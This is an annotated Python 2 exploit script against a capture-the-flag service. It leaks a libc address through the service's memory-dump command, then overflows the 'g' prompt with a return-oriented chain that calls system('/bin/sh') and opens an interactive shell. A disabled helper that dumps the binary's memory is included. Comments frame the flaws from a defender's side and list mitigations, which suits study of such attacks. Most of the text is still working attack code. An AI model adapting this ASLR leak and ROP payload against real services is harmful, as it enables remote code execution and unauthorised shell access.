# Python 2 script (print statement, str.decode('hex')) written against a remote
# CTF service. `codez` is the author's helper module; Remote, pack and unpack
# are taken from its star import and are not shown here.
#
# What the script depends on, read from a defender's side:
#   * the service's `db` command returns raw memory at a caller-chosen address,
#     which discloses a libc pointer and so defeats ASLR for libc;
#   * 0x401A13 is hard-coded, so the main binary is presumably not
#     position-independent - TODO confirm;
#   * 0x38 filler bytes followed by three qwords are accepted by the `g`
#     prompt, so that input is presumably copied without a length check and
#     without a stack canary in the way - TODO confirm.
# Removing the memory-dump command from production builds, bounding the `g`
# input, and building with PIE and stack protectors each break one of these.
from codez import *

# Offsets are specific to one libc build; they are meaningless against another.
LEAK_OFFSET = 251072     # offset of the leaked pointer's symbol inside libc
FUNC_OFFSET = 288320     # `soff` in the original - presumably system(); confirm
BINSH_OFFSET = 1559771   # `binsh` in the original - presumably the "/bin/sh" string
POP_RDI_GADGET = 0x401A13  # fixed address inside the main binary

conn = Remote('int3rupted_3bb8f10793b82841c44a366eb9f27223.quals.shallweplayaga.me', 0xcccc)
conn.read('>')  # presumably consumes output up to the '>' prompt

# Ask the service to dump memory at 0x6030B8 (looks like a GOT slot - confirm).
conn.sendline('db 6030B8')
reply = conn.read('>')

# Reply layout as parsed here: "<addr>: <hex bytes> - <hex bytes>". Only the
# bytes between the first ':' and the first '-' are used (the first 8 bytes).
before_dash = reply.split('-')[0]
hex_digits = before_dash.split(':')[1].replace(' ', '')
# 'Q' carries no byte-order prefix, so the value is read in the byte order of
# the machine running this script (assuming unpack is struct.unpack).
leaked_ptr = unpack('Q', hex_digits.decode('hex'))[0]
libc_base = leaked_ptr - LEAK_OFFSET
print 'libc', hex(libc_base)

# Switch to the `g` command and wait for its '?' prompt.
conn.sendline('g')
conn.read('?')

# 0x38 filler bytes, then three 64-bit values: the gadget address, the
# argument pointer and the function address, both rebased onto libc_base.
filler = 'A' * 0x38
qwords = pack('QQQ', POP_RDI_GADGET, libc_base + BINSH_OFFSET, libc_base + FUNC_OFFSET)
conn.write(filler + qwords + "\n")
conn.interactive()

# Disabled helper kept from the original: it walks memory from 0x400000 in
# 0x40-byte steps through the same `db` command and appends the decoded bytes
# to elf.dmp. The indentation is reconstructed from a single collapsed line,
# so the nesting of f.flush() / addr += 0x40 is a best guess.
# addr = 0x400000
# f = open('elf.dmp','w')
# while True:
#     conn.sendline('db 0x%x' %addr)
#     x=conn.read('>')[:-2]
#     for l in x.splitlines():
#         print `l`
#         f.write(l.split(':')[1].replace('-',' ').replace(' ','').decode('hex'))
#     f.flush()
#     addr += 0x40